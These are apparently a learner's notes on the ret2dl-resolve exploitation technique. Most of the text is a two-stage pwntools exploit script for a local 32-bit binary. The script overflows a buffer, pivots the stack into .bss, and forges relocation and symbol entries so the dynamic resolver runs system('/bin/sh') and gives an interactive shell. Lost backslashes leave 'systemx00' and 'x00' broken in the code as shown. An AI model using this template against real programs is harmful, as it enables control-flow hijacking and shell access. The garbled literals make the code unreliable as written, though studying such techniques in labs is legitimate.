ret2dl学习笔记

http://pwn4.fun/2016/11/09/Return-to-dl-resolve/

怎么说呢，这个东西非常模板化。

32位程序的利用

# Original note: delete all the Chinese comments before running -- presumably
# because a Python 2 source file without a coding declaration rejects them.
#
# Two-stage ret2dl_resolve proof of concept against the local ./main binary.
# Stage 1 returns into read() to copy stage 2 into .bss and pivots the stack
# there; stage 2 returns into PLT[0] with a relocation offset that points at a
# forged Elf32_Rel / Elf32_Sym pair, so the lazy resolver looks up "system"
# by name and calls it with the string staged at bss + 80.
# NOTE(review): this relies on lazy binding and on fixed addresses. A binary
# linked with full RELRO (-z relro -z now) has no lazy-resolution path, and
# PIE would invalidate every hard-coded address below.
# The code appears to be Python 2 (str payloads concatenated with p32(),
# and '/' used as integer division when computing index_dynsym); it will not
# run unchanged on Python 3.

from pwn import *

io = process('./main')  # spawn the local target
elf = ELF('./main')     # used only for its PLT/GOT symbol lookups

# Addresses taken from this specific (non-PIE) build of ./main.
start = 0x080483F0           # not used below
pop_pop_pop_ret = 0x08048619
bss = 0x0804A040 + 0x800     # scratch area inside .bss where stage 2 is staged
pop_ebp_ret = 0x0804861b
leave_ret = 0x08048458

sleep(0.3)
# Stage 1: 0x6c bytes of padding plus a saved-ebp slot, presumably reaching
# the saved return address -- TODO confirm the offset against the binary.
payload = 'A' * 0x6c
payload += p32(0)
# read(0, bss, 100): pull stage 2 into .bss; pop;pop;pop;ret discards the args
payload += p32(elf.plt['read']) + p32(pop_pop_pop_ret)
payload += p32(0) + p32(bss) + p32(100) # read the ROP chain into bss
payload += p32(pop_ebp_ret) + p32(bss) # stack pivot: ebp = bss
payload += p32(leave_ret)              # leave; ret -> esp = bss + 4, return into stage 2
io.sendline(payload)



msg = '/bin/sh'
PLT = 0x08048380          # PLT[0], the stub that enters the lazy resolver
rel_plt = 0x08048330 # objdump -s -j .rel.plt main
index_offset = (bss + 28) - rel_plt   # fake_rel lands at offset 28 of stage 2 (see layout below)
dynsym = 0x080481d8
dynstr = 0x08048278
fake_sym_addr = bss + 36              # right after the 8-byte fake_rel
# Original note: the struct is 0x10 bytes and must be aligned. Elf32_Sym is
# 0x10 bytes, so the forged symbol has to sit on a 16-byte stride from .dynsym
# for the index computed below to be integral.
align = 0x10 - ((fake_sym_addr - dynsym) & 0xf)
fake_sym_addr += align
index_dynsym = (fake_sym_addr - dynsym) / 0x10   # symbol index as the resolver will compute it ('/' must stay integral)
r_info = (index_dynsym << 8) | 0x7               # ELF32_R_INFO(index_dynsym, R_386_JMP_SLOT)
fake_rel = p32(elf.got['write']) + p32(r_info)   # Elf32_Rel: r_offset = a writable GOT slot, r_info
st_name = (fake_sym_addr + 0x10) - dynstr        # name string is placed immediately after the 16-byte symbol
#st_name = 0x4c
fake_sym = p32(st_name) + p32(0) + p32(0) + p32(0x12)  # Elf32_Sym: st_name, st_value, st_size, st_info = 0x12 (GLOBAL | FUNC)

# Stage 2 layout (offsets relative to bss):
#   0   p32(0)            consumed by the "pop ebp" inside the leave above
#   4   PLT[0] + reloc offset + return-address slot
#  16   args for the resolved call
#  28   fake_rel, then `align` bytes of padding, then fake_sym, then the name
#  80   msg
payload = p32(0) # consumed by the pop ebp in the leave above
#payload += p32(elf.plt['write']) + p32(0)
payload += p32(PLT) + p32(index_offset) + p32(0) # return into PLT[0] so it resolves our reloc; trailing p32(0) is the return-address slot
#payload += p32(1) + p32(bss + 80) + p32(len(msg))
payload += p32(bss + 80) + p32(0) + p32(0)       # first argument of the resolved call: msg at bss + 80
payload += fake_rel                              # offset 28, matches index_offset
payload += 'A' * align
payload += fake_sym                              # offset 36 + align == fake_sym_addr - bss
payload += 'systemx00'                           # rendering dropped a backslash here: intended NUL-terminated 'system\x00'
payload += 'A' * (80 - len(payload))             # pad so msg starts at offset 80
payload += msg + 'x00'                           # same rendering loss: NUL terminator intended
payload += 'A' * (100 - len(payload))            # fill the 100 bytes that stage 1's read() asked for
io.sendline(payload)
io.interactive()

64位版本稍作调整即可：read 和 write 的传参用 init_csu 的 gadget 应该就可以了。

原文地址:https://www.cnblogs.com/lxy8584099/p/13687515.html